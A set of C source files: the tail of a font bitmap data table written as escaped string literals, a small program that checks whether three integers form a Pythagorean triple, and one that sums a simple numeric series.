"I\216\24\7\251\216e\303A\213jR[\242EY\232EbIK\207\0\226d&\356\340\373\207\302A" "\254U\262(+U\324%\34\244j\230\205\265\341)\254H\225(\314\242$\213\222L\7R\0\226h*" "\336\340\373\30\244A\312\242,\252\15R\35K\262aH\242j\222%Q%K\242\212\224D\225Dj\311" "\221\60\7\22)\25\5\226i&\356\340\373\207\302A\254U\262(+\265.Q\16H\331 e\71\224\265" "HITI\264\244\24gQ\16e\341p\226j)\356\340\373G\322A\254\15\7)+\25\243J\232d" "Q\62\34\262\34\312\222aH\244$M\22)M\322J:\14IZ\1\226u)\356\340\373\207\302A\254" "%\303\220Di\30%\303!\11\263\250\65\311\244P\313\206H\252E\211\224\324r$\214\25)T\5\226" "v(\355\340\373\216\207(\216\242a\220\222\242\22\16\311\230dJ\232I\311p\12\63\251RY\242\244\242" "d\203\242\203:\244\0\226w&\356\340\373G\322A\213j\331\240DY\251\255\222\345@\24*C\226\250" "Z\22O\311\64$R\254\306\352p\215\3\226\205+\336\340\373\30\224aH\262$\252D\321\60$Q\227" "\332\60$\345\60J\206C\246eK-I\224(\31\222\61\7\304\34\20\323\1\226\206,\356\340\373\7\342" "A\32\226,\21\223(\211\272dZ\222F-\343\226\15Q\226D\241\224\14C\222(Y\230\16C\222#" "a\66\34\2\226\213*\356\340\373G\322A\31nQ\34e\303\22\325*Q\62\14R\216\225\206%\213\302" "D\212\206%\321\302$\36\226\70L\342L\1\226\217.\356\340\373\207\302!\15#e\270DU-\31\226" "Z\222%\321A\211\222(K\242$\32\24\245\224%\245Z\22F\221\222%\71\20e\303\20\226\220.\356" "\340\373G\322A\32\244,\312\242\266R\222\14K\35J\242h\30\222,\7\222,\31\206D\252\204\211R" "J\212I\252EY\242\3C\4\226\224*\336\340\373\30\222\341\20\345X\22\16R\22f\221:HI\16" "F\311p\210\222(\211\226Z\246D\311\240\210Y&f\231\30\13\226\230,\356\340\373\30\242\254\224%a" "\224cI\64\14\212\216&YS\222F\221\16$Q\62\14\221\322S\22%Ma\322\24&M\321p\20" "\226\231/\356\340\373\207\302AJJY\22ES\222eR\230&\331\60$Q\65\311\222aH\262$M" "\244d\30\222D\15\323(\211\302\244\224d\305\0\226\234.\356\340\373\207\302A\31\206$\213\262\250\62\34" "\242\34K\262aH\242j\222%\303\220dI\232H\311\60$\211\32f\303AG\302\34\11\1\226\247." "\356\340\373G\262d\20\243$\13\223\250\222\14\203\324\230dII\312\242\244\66%Q\226T\26)\211\222" "\304\224D\211\32ia\22g\331\60\226\266$\355\340\373\316\201\207\34\311\242\341!\316\262\341\220#\71\222" "\205Z\244\310I\35\231R)\213\244$Ts\0\226\276)\356\340\373\7\222\34\214\262!\312\261h\30\264" "D+)Y\230D\303\220\265JY\230D\303\20\205Y\65\313\241a\220s\0\226\300#\355\340\373\316\241" "Z\32U\244,\311\222P\15\243\34\370\240\345\310p\314rd\70f\71\222\345\310p\10\226\301,\336\340" "\373\32\236\262D\316\222j\24\15S%J\223!J\225d\30\242J\224FI\224F\311\60$Y\22\205" "Y\22ea\62\14\1\226\304-\356\340\373\13s$L\342\254\64<H\231\224&J\224&\321\60$\265" "(L\262(\213\222d\30\242J\24\16\211\224\206\303\220\3\61\0\226\305*\356\340\373G\322aH\352@" "\224\225\242aH\242D\312J\265a\31\206\60*K\325$\32\206$j+U\223h\30\262\62\0\226\306" "#\355\340\373Kr(\313\221\341\20iq\62\34\263\34\31\216Y\216\14\207\254<<\204I\35\210j[" "\66\226\307&\356\340\373\316\11\71\62\34\264\34\312\206\203V\311\201(\213\243\341\224h\261\62\14Z\224\245" "\331\60HY\61\34\16\226\314-\356\340\373\314r \311\222\64\211\252I\62\134J\265d\230\262\244\64\14" "J\251\226\224jIi\30\224R-Y\244LR\206!\7b\0\226\315&\356\340\373\315\11\71\360A\213" "\312Y\61J\206\27-\215\206A\252d\331\240d\71\220\14C\30eiV\23\207A\226\317,\356\340\373" "Js M\322$*\16\312\60hQ\71\222\262a\31\206\64\211r\244\24\16\312\60\244I\224#\245l" "X\206!Mb\0\226\325+\356\340\373\207\264a\210\222(M\242.\303\220\234\272D\321\60$\303\220&" "Qe)UZ\206!YJ\225N\325d\30\262%\5\226\350'\335\340\373\370\20\347h\16<HI\224" "D-Q\22U\242$\12KI\224D-Q\22U\302(\214\222(\314\42\0\226\352#\355\340\373\31\16" ":\20\17\17j\252,\311\22\347\310\222\354H\16<\350h\66\34r\64\32\16:\232\0\226\366!\355\340" "\373\31\16:\20\17\17R\307A\235\242\71\311\241,V\62I\14\265a\310\301\34\332\341\20\226\367\42\356" "\340\373\32\16:\222\3\37\222\264\222,\311\42\347\320\222\354\324\341\232U\207kV\35\256\71\20\1\226\371" "$\355\340\373\31\16:\20\17\17jiIv$G\262\34\31n\71\22E\203\224fQ:(Q\226#" "\341p\226\376#\355\340\373\31\16:\20\17\17R\307A\235\242\61\312\221a\320\201(\35\22ePsd" "\70\304iv\3\227\0\42\355\340\373\31\16:\20\17\17R\307\244,E:\22\17\17i\216\14\7\251-" "j\213ZJ\71\22\1\227\4!\355\340\373\31\16:\20\17\17R\307A\235\242\61\252\16\307\34\10\207c" "\16\204\303\61\7\302t\2\227\7'\356\340\373\32\16:\222#\303SXJ\226d\207rd\70h\71\234" "\14\203\230\303\303K\224%a\224(a&\16\1\227\11$\355\340\373\31\16:\20\17\17R\307A\7\242" "\352pPr\60\32\6\65\312\242\341!\213\262t\70\344P\6\227\15\42\355\340\373\31\16:\20\17\17R" "\307A\235\242\61\313\221\341\26\306\303A)\346\300C\26\346\300\203\0\227\23$\355\340\373\31\16:\20\17" "\17R\307A\235\242\65\307\264!\314\201pH\206\60\7\302\341\22F\341\240\15\3\227\26\42\355\340\373\31" "\16:\20\17\17jiI\206\34\310\241\64N\263a\31\266\64\335\266\244O\335\222,\3\227\34&\355\340" "\373\31\16:\20\17\17R\307A\235\242\61G\263A\31\226,\314\6m\312\242\244\62(QR\13\263A" "\1\227\36&\355\340\373\31\16:\20\17\17jiIv$\7\6e\220\262\64\32\224A\312\321!\31\246" "\64\312\206L\14\245\1\227\62(\356\340\373\31\16:\222\3\37\222\250\353 O\321\16\345\300\20\15Z\224" "H\341\220\351@dK\16CR+\15\322 \1\227\70&\355\340\373\31\16:\20\17\17jiIv\312" "\360\226DY\64(\203\224\264E\203\62\210Ye\30\224b\224E\0\227\71(\355\340\373\31\16:\20\17" "\17R\307A\7\242\342\360\222%Y\64HI\26\16C\62h\241\224\14J\62di\224e\0\227R " "\355\340\373\316\201\7\35\310\221\341\216\304\303CN\32\206\70\215\207!N\343a\210\323\70\324\0\227V(" "\356\340\373\212s \32\6-\15\207e\330\261\64J\206A\211r\60\211\206-l\33\266!\11\23u\330" "\221\60G\62\5\227Y(\356\340\373\13\343A\32\304\254\66lq\66,\303\20\325\201\203\62hQ\255\24" "\15\312\60e\245h\320\322,\251FR\12\227[,\356\340\373K\323A\214\263aH\6%\315rlX" "\206!\307\302A\254EI\70H\311\220dQ\22\16R\22fI\42FI\66\4\227^&\356\340\373\215" "r,\312\261(\35\246a\215r,\212\7i\220\243\34\213r,J\207iX\243\34\213r,J\1\227" "`$\355\340\373\213rh\270\225\207\207l\30\324\70\35\6\35\210\322A\32\324(\36\242!\216\322A\32" "\324(\4\227a%\356\340\373Gr\340S\61\35\236jc\262\264)\245\266(\36\244A\312\242x\220\206" "(\214\322a\32\326(\4\227b!\335\340\373\370\220\346`\16\15\7\251\26\265E\245Aj\213\332\242\322" " \265E\321p\220r(\1\227i \355\340\373\314r$\13\207\207\60\313\221A\307rd\70f\305\254" "\70\334\221xx\210s\64\6\227s(\356\340\373\252cQ\252\14\7\65\252\3C\224#\341\260\14R-" ")\325\6\251\32F\321\60$Q\232U\263j\24F\0\227t.\356\340\373\252%a\224%\331\60%a" "\324\70D\225,\223\244a\211\262$J\22mX\224\64\214\322\60\212\206!\211\222,\214\222,\314\4\227" "v,\356\340\373\311rd\30\222A\312\242\244\64HI\261R\32\244\244\224\224\6))e\321 \305I" ")G\302t\30\222\60\13k\351 \227\213&\356\340\373\311\302Z\230\15C\26f\321 \15b\134\33\206" "d\30\242:p\310J\225A\214\263a\310\342\246a\20\227\215*\356\340\373J\302\70I\263a\31\206(" "\211\322hJ\242\60M\7e\30\222\266$\33\264$\15\243h\30\222\71VKa\64\6\227\230*\356\340" "\373J\322JT\32\6\245-I\323m\20k\321 eQR\32\244A\312\242\244\64\210\265d\30\222," "\254\24K\21\0\227\240-\356\340\373J\262\34H\262t\30\222\34H\242a\210\226(k\211\224ARz" "\31\206d\320*MSV\251\14\203\224\324\322\254\16(\0\227\255*\356\340\373)\306I\70\274d\225," "\31\224-i\312\224\341\240\264(\245d\70DIE)ea\245\64,Q\32&\305P\23\227\346\37\355" "\340\373\316\321xx\210s\64\7\36t G\343\341!N\343\64\216\222\34\310r$\6\227\347*\356\340" "\373\312\341\34\34\226a\210r \252\3Q\62HITM\242aH\242\216Qc\24)Y)\11\263(" "\215\222(\254\0\227\351$\356\340\373\213\333\206e\30\262\70\34\304Z\64H\203XK\206!\31\304(\213" "\243a\320\224,N\302\270\15\227\355(\356\340\373\215r,\312\261(\36\244A\216r,\312\201!\32r" " \312\261(\36\244A\216r,\312\261(K\206\7\1\227\363\34\356\340\373\316\11\71\360\65\314\241\352\360" "\240\323\206A.\17\203\334y\30\344\32\0\227\365.\356\340\373\212s \15\207!\32\224,\12\243$J" "\207A\312r,J\6\61J\262\64I\6MJ\262DL\262\34H\6\65\251\305\11\0\227\366,\356\340" "\373\312\11\331\360 eI\326\224\204\331\60HI\35\311\242A\311\201L\31\226,\12\223A\12\223,\12" "\223A\32\226,\12\3\230u!\335\340\373\370\20\347`\216\15\203\32\247Q\226FY\32ei\224\245I" "\230\3\211\216\204\332\16\10\230v\42\356\340\373\35\36\304\34\10s$\32\206\60J\303(\15\243\306\250\61" "j\214\32\243.a\24\66\313\1\230w&\335\342\373\310\206C\16\204\341\60$a\232\14IT\11\243J" "\30U\302\250\22%Q\245\324\242&Y\232\251r\0\230y!\336\340\373\36\36\304\70\315\201l\30\262j" "V\252\225j\245\332\22EC\30\325\241$\307\62Y\15\230z'\356\340\373\311r(\33.miR\31" "\246\244\61J:U:U:U:U:U:UjI\24FY\222\252\1\230{\42\355\340\373S\206" "!K;\16\203\244\244Y\324-\252\204Q\244F\65%\252EIS\32UCk\0\230}%\356\340\373" "\31\224a\310\261\34\315\301\341k\224D]\242.Q\227\250K\324%\221*\221\226dQ\226\315i\0\230" "~,\336\340\373\31\226a\311\221\60\36\226dH\302\244\224\224\222RRJ\22\245)iJ\242\244\230D" "I))%mI\24i\331\234\6\230\177)\356\340\373\213\206AK\303aHr$\33\306,\214\222N" "\225N\225N\321\240\224\302,\211\302J\61\211\252RXJ\23\0\230\201'\356\340\373\314\301$\32\206\250" "\330\24\246\311\260\14R\30\265D]\242.Q\227\250K\224d\225,)eI\26\245\1\230\202,\336\340" "\373J\222a\220\222\264\224\245Y\62LIc\224DRR\312\242$\13\243$K\242J\224%Q\70h" "I\16DY\216\244\1\230\204(\336\340\373\31\224a\10\313\332\260Fa\62\14J\24&Ma\322\24f" "I\24fI\24fI\24V\302$+f\251\0\230\205*\356\340\373\313\341l\30\262!\213\323tP\206" "!\311\222\64\311\222\250\222%QeP\242J\32U\322\250\222\3I\26gs\32\230\206+\356\340\373\313" "\341h\30\64\61\216\352@\66\14Q\222\205I\26Ur$J\242A\211\222\70\211\222,\211*a\232\304" "Y\65Q\3\230\207+\356\340\373\313\341l\30\222a\13\223\250\232\224\6)\11\263hX\232\302\244I\252" "\224\222RR\252%\245HK\242\226,)\246\1\230\210&\336\340\373\31\224aH\303\34Hcm\320\42" "%\213\302\244;\220\224\206\245\261R\254\24\323$\35\222l\20\323\0\230\212(\356\340\373\313\341lx\320" "\342\64\214*\203\224\224\262()%\225aH\32+\305J-\311\222Z\224%Y)K\342\64\230\220." "\336\340\373\270\14\203\224\206Q\230&C\62,\245$LJI\224\64%QR\31\222()eQR\312" "\242\244\224&\321\60$Y\216\244\1\230\221+\356\340\373\313\341h\30\224dK\223\264\222\15\313\60\210\265" "(\211\222,J\242\244))%\245$\215*a\232\204i\226\210j\0\230\223)\356\340\373\324\241\303\240" "\245\341\60$\71\240\15S\42\205I\224\64EC\242D]\242.Q\213\22\225\244$+eJZ\1\230" "\226*\355\340\373\311\321H\31\226\65\314\222a\32\222\60MJ\311\20%QV\211\206K\224U\242hJ" "\242\244)\211j\231\26\245\1\230\227+\336\340\373\270\14\203\224d\341\60\15J\224DY\22%QR\31" "\246\244X\251\14C\322X\251mI)\251%QK\26fi\0\230\230(\336\340\373\32\222a\210\212\351" "\20\15ZT\313\206(\251CIe\270T\263\244\226,mI\230\204IVJ\244T\34\16\230\234\60\356" "\340\373\313\11\331\260\14C\224fQ\16$\321\260\14\203\230dQ\22%Q\226DI))%Y\224D" "I\242%Q\22fR\246E\213&\6\230\235(\356\340\373\313\11\321\360\240U\262d\320\206(\213\244J" "QKjQ\245\24&]\206!\251U\332j\342 \325*a\0\230\240-\356\340\373\313\206\7-N\323" "A\32\244,\312\242AJJY\224\224\6))eQR\32\244\244\224EIe\30\224b\222U\264$" "\15\230\244(\356\340\373\313\206\7-G\303aH\6\245\267$YzMZ\206!i\207\222\322 %\245" ",JJ\203X\253D\303M\230\247)\356\340\373\252\14\17Z\32e\341rPzK.M\265\244\64," "-R\226\224\206\245\251\226\224\206)\311\242\254\64\14i\0\230\316%\336\340\373\32\256\71\220\206Q\32F" "i\22U#-\315\252Q\22\245I\324RL\242$N\242$\207\22\35\24\230\330)\336\340\373\70$\203" "\226d\225aH\262\244'e\30\22;\224\224\6)\251CIe\30\22c-J\32\243\244U\221\342\0" "\230\336\36\314 \374\70\344`\226\3Q\216\324!\35Kr(\322\201,Gr\60\313\221(\207\6\230\337" "#\355\340\373\316\301$\207\262\34\210\252a\24)\303\220hi<\14q\32\17C\234\25+i\222\305\352" "\0\231\20*\356\340\373\313\341!\31\226j\24\15\233\224\224\222(\214\222p\210\222:\360\264\324\22\61\252" "\3\207$\315\242\70\211t@U\0\231e&\356\340\373\311\341x\310J\265Aj\214\332Ja\32\205i" "\24\246Q\230Fa\324\22%Q\226DZ%\312\302\1\231m*\356\340\373\311\61%\35\264\64\7\6%" "\7\262dX\232\264b\22ea\22ea\22ea$FI\224&\65Qj\213\212\1\231n \356\340" "\373\211{\36\224a\11\223\60\311\222(\11\343\276&iTI\223(\13\245\64\213r \231o'\356\340" "\373\211[\302\70\312\6)K\302a\210\262:\220FS\66\250q\224\305I\30\205i\22J\221\30%Q" "&\12\231p'\356\340\373Is \315\201t\30\222a+\326J\303\20\205Qc\324\30\65F]\242\226" "(R\42-J\262\34\310\0\231q+\356\340\373Is \315\201t\230\6%LB\65\311\242!\311\302" "(\311\302(\311\302!\311\302Z\224Db\22\245\221\226F\351\60\231r'\356\340\373\311\341p\30\224\34" "L\6eP\304\34\320\242!*F\215Qc\324\70D-QK\216D\262\22\345P\2\231u'\356\340" "\373\311\341l\270\244Y\66(Y\24&\203\224EYX\13\303A\254\205\265\60\32NI\34\352@\230#" "\21\0\231v'\356\340\373Js \215\264l\20\7)\213\262J\242\205Rm\232r\70\32Ni\222&" "Y\222\212IT\214\252\342\0\231z'\356\340\373\311\201\64G\302p\30\224AG\302\250-\12\263b\22" "\245Q\230Fa\254F\231\232dQ\250\205Y$\7\231|'\356\340\373I\263r\224\345H\70\350H\70" "\34\222Z\24\246Q\230\15\203\224Fa\32\205I\26\205Z\261\226#a\4\231\177,\356\340\373\211\223\60" "\224\264\250%\32\224(\251E\265(\31Na\224\206\211TTj\231$FI\226Da\244DJ\223\224" "%a\0\231\201)\356\340\373\311\221)\34\242r\26\15I\224DYT\213\302\34Hs \32Ni\24" "\326\302(\311\302$[\305(\214F\1\231\205&\356\340\373\211;\17\322\240\204I\226\204Q\226\311\231\64" "DY\34eq\224-C\24\311QR\216\244a\220\262\70\231\206'\356\340\373\211\353@:$\303\240D" "I,%qR\34\304Z\30\16b\35\11\207-\211\302L\13\263p\330\221\60\1\231\210'\356\340\373\311" "\201\64\34\206\250\22\225\206\227,\254%\303 \345p\66\14Y\65+\325\42\251\226\224\224L\214\302L\24" "\231\213'\356\340\373\211\313C\226F\341\220\14C\222M\225\64\252e\303\220\245I\32FMJ\64\305j" "\222\203\332\234\3\22\0\231\217,\356\340\373\211\213\312\240\204\225dX\242\244\224$J\42ER\244dQ" "-\315\201l\30\262R-\32\6-)\325\244\266l\30\22\0\231\222)\356\340\373I\207)\15\243A\31" "\246,\11\223,\32\226:\234\15\203\224%\245\332\60H\71\234\15C\226dQ\250\252\331\64\231\226\42\355" "\340\373\312\201\264\16d\341\360\220\346`\216\15\307\34\10\207c\16\204\303\61\7\302\341\230\3\21\0\231\231" "\42\356\340\373G\306a\310\321\34\316\201\17\261\222CI\24K\231\244\14\203\242\305\361\60\310\235\207A\3" "\232l \335\340\373\31\356h\16\204\71\220\345@\230\3a<\34t\64G\207\203\224\203\71\226\344`\4" "\232m'\356\340\373\30t\70\32\246Z\251V\252\225j\245AKr KB%K\42-\323\221\60G" "\262$L\262b\226\6\232n)\356\340\373\30\304\34\11\323(L\243\60\215\222aP\242\60\35\264\34\312" "b%\13\265(\311\221(\311\221Z\230Da)\16\232o\62\356\340\373\30\264\260\26&Q\226DI\224" "%Q\22eI\224DY\22%\203\224Di\224D\221\22%\321\26%Q\32%Q\232\244Q\22\245Y" "\24\7\232p*\356\340\373\30\324\34H\303\250\61\352\22\225\206$J\6)\31\224\250\232D%\245\24m" "I\64'Q\216T\243$J\263p\30\232q+\356\340\373\30t\70\32\206$\252\3Q\61*iQK" "mP\42\35H\262P)%\211\226\224\342D\213\223\34)\345P\66\14\1\232s'\356\340\373\30\244\60" "\315\242,\12\305(\213\262\250\30\325\261A\256\204\231\22\225\264J\16\204\71\222%a\222\25#\65\232t" "+\356\340\373\30\324\34\210\263(\33\226(\13\223(\13\223(\13\223A\32\326(\214\224(\325\242\34\213" "r,\312\201$\312\241:\0\232v*\356\340\373\30\324\34H\303(\32\206$\352\22u\211\272\14\312\60" "\244ITR\302L\213\222\34\211\222\34\311\342$K\324H\24\232y.\356\340\373\30\264\34\312\342\250\16" "D\321\60$Q\22'Q\64D\311\240D\325$*)\245hK\206(M\242j\16DI\234d\71\222" "\0\232{)\356\340\373\30\264\34\12\323(L\243d\30\224(L\243\60\35\264\34J\206M\311B\255\16" "e\71\224\305I\62\14Z\216\1\232|*\356\340\373\30\304\34I\303(\32\206$\252&Q\222Ful" "\220r,\312\62%J$-\322\241:\26\205Q\222\205Y:\10\232~%\355\340\373\312\261aH\6)" "K\262(K\262\244i\330rh\270\3a\234\306\303!G\207\203\224\243\71\264\0\232\202#\354\340\373\31" "\224A\311\222,\311\222,\31\224A\207\207A\16\343\60\36\356`\16\16\7%\7sH\1\232\204,\356" "\340\373\30\324\65\31\322(L\243\60\215\222aP\242,\312\6%\214\225(\211\224\250\244Eu \252\3" "I\26&Q\226Fa\4\232\206,\356\340\373\30\264\34\312J\265a\211\42-\252DI\26\245\341\240%" "\71\20e\231\62\34\264$\214\223\60N\302,\211\206\61\13\23\0\232\207*\356\340\373\30\304\34I\303(" "\31\6%\12\323(+\265e\203\62\344H\30EJ\226mQ\26'Y\16\204I\226\204YM\14\232\213" "(\356\340\373\30\324\34\210\206!\211\272D\321\60$Q\227(\32\206d\320\341\341\244d\241\26\15r\267" "$M\302\34\210\0\232\214,\356\340\373\30\304\34\11\323(K\302(\213\262\250\250DI\62d\203\16G" "Y\246H\25-)\305I\226\3i\230$\303\240\345\30\0\232\217+\356\340\373\30\324\34\10\323(+\225" "\206!\211\302\244)+\15J-\215\6MI\264DS\242\34\310\222\34\10\323$L\322h\23\232\221," "\356\340\373\30\304\34I\206!*\246Q\226\204Q\255\224\14\203\62\310\225!\211\223(\311\224R\222h\311" "\220\304\265$M\302\34\210\0\232\227+\356\340\373\207\302!.\15C\224Di\224D\303\20%Q\216\14" "\311\60\210IS\245\323\224\14\203\230\64\205IS\245S\226\304\2\232\232*\356\340\373\30\224a\20\243$" "\352%\252EY\24\212Q\26e\203\22\306\303IiJ\264\244\24'\303\234\64&a\24F\303\22\232\241" "-\356\340\373\30\244a\10\243\226(\32\206$\352\22E\303\220D]\6-\212\223AT\262(\321\222a" "H\303\34)%Y\322)K\263\0\232\244-\356\340\373\30\224A\7\242$Y\242hK\242J\42\225\246" ".-\303!\211\263$T\242[\22%\261\246\3QRK\242J\30eQ\0\232\250#\355\340\373\33\206" "\70\215\207(\216\212\303K\216I\303\220\204i<\14q\32\17C\234\306Y\22\207!\0\232\270,\356\340" "\373\31\264\64\13\303%\31\206\244\61\33\206\250\222&Q\66(C\230\205Q\62hQ-\252\15J\24f" "\225,)eQE\15\232\323,\356\340\373\31\304Z\64,\213\224&-\303KT\215\6e\320\242\332\62" "D\203R\252%\311\20\15J\251\226T\244\244\35\210\222d\30\232\330!\355\340\373\216\207\207\234\64\14q" "\32\17CN\33\16R\16\225\6\251-*\15R\35\252\3\13\0\233\3$\355\340\373\31\66)\26\207\35" "\310\21e\30\22\65J\225\60\213\206\7\35\314\206!\247\15\7\255\224I\233\2\233<\42\356\340\373\315\321" "\34\34\256Yu\270f\325\254:\334\221:\230D\71\20%\325,Y\242\60\235\207\1\233A,\356\340\373" "\313\201\60G\262aJ\262$\312\264a\314\222(\211\262$\252d\303\270E\311\220*aE\311\302d\310" "\222R\216\210\303\1\233B)\356\340\373\207r\64\36\222a\310\201\250\16\34\222a\210j\245Z\66\14Q" "-N&%\232\222\356@\62\310Q\226\206C\0\233D-\356\340\373\212\253q\70\14\311\240D\225,\31" "\206$K\242J\226D\225A\31\206$\253f\231\22eQR\31\246d\220\243,\15\207\0\233O+\356" "\340\373\224\342-\207\242aH\206!\252-\303\20%\211T\211\272e\303\220\14[\234dR\233R\322\222" "d\211\222(\23\303!\233T,\356\340\373\7rdx*\246\303S\62\215J\242$R\62\14b\22e" "a\62\14b\22ea\62\14Z\230\224\222,R\22I\34\4\234|!\356\340\373\315\341AG\262\34\311" "rd\70dIV\315\252\303\65\253f\325\341\232\3\71ix\20\234\201 \355\340\373\314\301a\16\343\341" "\20f\305\341\230\225\206\207\234\62\34s \34\216\71\20\16'\0\234\215-\356\340\373Js`\210r " "*G\321\260\14K\30%\311\260DIS\22\15\312\220DIc\64(Q\222#Y\272\244C\230\346\310" "\60\234\234&\356\340\373J\263l\310\242\306$\252\15C\62\210\225b\245\64H\203X)\206\203\62\14\71" "\26\217\331\16\344p\6\234\244*\356\340\373\312\341!\31\206$j\222\262\250\62(\303\220t\252\14JT" "i\31\206\244\61\34\304\34\33\206l\314v \207\206A\234\270+\356\340\373\212\343!,E\303 \345\340" " \15RR\312\242A\312\242\244\64HI\61\34\304\34\213\222p\211\242!KJ\71\24\2\234\303-\356" "\340\373\312\341!\31\206$K\242H\213\206!\31\224\250\322\251\62(\303\220\264CI-\35\304$\7\222" "R\264\24\267(\313\261!\1\234\326$\355\340\373i\12\207\7\251\222)K\224$J\42I\331 ia" "<\334\264R\62\34\263\342p\247\14\17\1\234\336-\356\340\373\11\243\322\240\264Ea)\32\36\242\244\224" "\64E\303\240dQR\32\6%\231\222hP\242$\207\206!\232\262H\254\3i\4\236\37\36\354\340\373" "\316\261\34\32\206\264%K\243j\250\346\340p\7\207C\224\203\71\224\344X\2\236!'\355\340\373\207r" "\60\34\226AN\262\70\221\272\324\222(\22\263\34\311\206)\311\201(I\6\245\216\351P\222\203\11\0\236" "#'\355\340\373Gr\60\35\242a\211\212IT\211\222\250\22%QIj\36\242a\310\321p\30\222\34" "\315\261$\7\23\0\236%)\355\340\373\207\262a\12\343A\311\242,\221\42)iJ\232\262H\211\262\64" ")\15\203\224\3\342\260\350\340\60\204I\16&\0\236&+\356\340\373\307\262a\210r$\33\264$k\311" "\244\266\244\62\14I\244f\71\242\15S\222#\245dX\264\34\211\222\70\311r$\1\236-*\356\340\373" "\207\302AK\223\322\260\64\205\311 %Q\322\24-M\361 \15C\224cQ\216E\321\60\325\261(G" "J\71\224\0\236/\42\355\340\373\316\221\341\230\225\206\207\60\313\201\250:\234\224Z\242E\345\341\216&\303" "!\311\321\34\223\0\236\63%\356\340\373\313\341!\31\264J\26%\245\304V\314\242h\220\206\233\22\227\42" "\71\313\241\341\220\303\321p\312A\11\236\65'\356\340\373\313\321\70\35\304Z\62\14\211\224\244Iw \213" "\342(\213\262a\251C\211\16(\325-\11\343$\14\265A\236=,\356\340\373\213\253q\222\15ZT\213" "\302DJ\222!Q\352P$\15R\234E\303\222\345@\222%\203\222\14:\220di\222\243\11\0\236\77" "*\356\340\373\311\221\64\256\16J\66hQ\26I\225RRL\242HL\242\34\210\242\341$GC\62(" "Q\216E\71R\312\241\4\236C)\354\342\373G\262A\12\263dP\262$K\6E\312\201\244\62(\221" "\222%\351\240\14C\26\17\7E\213\225b\42\305\11\0\236E+\356\340\373S\263E\32\264\244\255\222I" "\311p\251%YK\226\210KY\251\14C\22\345@T\32\222(QRER\223\64S\0\236J,\356" "\340\373J\322J\30\16C\62hI\326\222I\311\60$\355P$\15R\234E\303\222\345@\62(\203R" "\313\201dP\223Z\234\0\236O$\356\340\373\307\262e\12\223\226A\351-\271HI\377'\245\327\345\60" "$\315JeX\224f\245\61qM\0\236d-\356\340\373\213\253\351\260\14R\22%Y%\223\262$K" "J\303\22)m\71\60(\303\224\344H\64\34\222(\311\221h\20\223(\207\22\0\236p*\356\340\373\7" "rdx\252\224\223d\30\244A\212\223d\30\262\244\24G\303\251\222\205Q%\215\206K\16&\311\60H" ":\246\0\236\177(\356\340\373\7rB\16|\252E\331\360T\213\262(\213\262\341\240%a\234\204Q\226" "\14\311\26\205Y\22%Qf\34\2\236\223(\356\340\373L\303\341!J\64%\252\64iQ\323p\320\242" ":\360\240E\265l\70hI\30'C\262\224\302L\33\242!\236\246\37\355\340\373\316\321xx\210s\340" "A\7\342\341!\314\301a\20\223\60\323\242\34\323!\343<\236\273%\356\340\373\7rB\16|*\246Q" "\230\16O\305\64\231\306DIF%JJR\22U\262\60\13\353H\230\1\236\304#\356\340\373\254\16\257" "a\216\204\341\360 \347\320p\10\263\60\34\16a\26\206\303!\16s \326t$\2\236\315$\356\340\373" "G\326aGs\340\203\230\324\1)\322\264\233\222\210C\24\15iR\307v,I\324)\323\1\35\236\316" "*\356\340\373\134\322!\314\221pP\206AJ\262\65\211\222NIT\211b%\221\263HZ\242$R\207" "\34\252\244KIG\302\10\236\321&\356\340\373\32\16a-L\242\244\30%R\70\34r(\207sd\70" "\344P<<\350\224\250\326\224%a\224%\0\236\324+\356\340\373\70d\245Z\246$R\22%K\224D" "-Y\62\14R-\7\242a\310\261px\20s\70J\252Q\322\30%m\31\0\236\330*\356\340\373\31" "\266\60\211\262p\321\222(Q\262()e\341\260\14[\34\16[\134\33\206(\311\301$KjQ\322[" "\322\224\6\237\16(\354\342\373\33\206\264\226\14C\322\232T\206!iM*\303\220\324\241dP\6\65\11" "\207eP\262$K\262$\23\223,\237\23(\356\340\373\213\333\206!\213\263aH\206-\307\206iX\262" "(L\262h\230\222,\214\222\60\12\323$L\342%S\266\64\237 %\354\344\373\313\221i\220r$\32" "\222A\312\221h\70\344\4M\252DI)\314\42M\252DIe\223\22\61\24\237;\42\356\340\373\316\261" "a\310\201\64\7\16\71\220\246\303A\13k\303A\13k\303A'\15\17bu\15\1\237P\42\355\340\373" "\315\341xx\310\322\34\310rhG\64m\7\306,G\262\34\311r \314\201\60UC\0\237\177\42\335" " \374\316\241:\24\15c\24\17\17\71!,\205\245,\311\242\232\22%i\22\345P\64\34\24\0\237\204" ",\356\340\373\213\303$\16\223!J\262$\314\222aH\244\34\211\42)\222\42\251\16D\225A\351\232h" "JT\215\264h\10\243-\214\0\237\213-\356\340\373\313\201\245\70&c%\34\224aJ\352P\322\224D" "\203\22%a\26%\311\60(\211\22E[\22)b\62]\322!JB\1\237\231%\356\340\373\215r\254" "\16e\71\224#\303\203\232\344`\222\305Q\26G\345,\311\201L\214\302\64\11UM\32\6\237\232%\356" "\340\373\314r(\14\207\207\64Jr \323J\312\240\350\244,\36\16r\226CY:<hi\252\3\22" "\0\237\237\37\355\340\373\313\321aH\313a<\34\242$+f\305\341\230\25\263\342pG\322\70\315\201\3" "\377\4\32\331\246\373\214\7-\252d\231VQr`\7\22%\313\264JT\33\344\20\377^\16=\42\375" "\31t \25sdH\0\377\340\27\270&\374\7\242%\312\224\60\321\42\255\24F\251\30eQ\62\1\377" "\341\32\314\42\374\36r L{\7s\340!\7r`\211\63UK\264d\134\0\0"; #endif /* U8G2_USE_LARGE_FONTS */
the_stack_data/187644523.c
#include<stdio.h> //第一行:三个整数(包括正整数、负整数或0)。第二行:输出判定结果:YES或NO,换行。 int main(void) { int a,b,c; scanf("%d%d%d",&a,&b,&c); if(a>0&&b>0&&c>0) if((a*a==b*b+c*c)||(b*b==a*a+c*c)||(c*c==a*a+b*b)) printf("YES\n"); else printf("NO\n"); else printf("NO\n"); return 0; }
the_stack_data/66742.c
#include <stdio.h> int main () { double soma = 0; float i, s = 1; for (i=1; i <= 39; i+=2, s*=2) soma += i/s; printf("%.2f\n", soma); return 0; }
the_stack_data/140765908.c
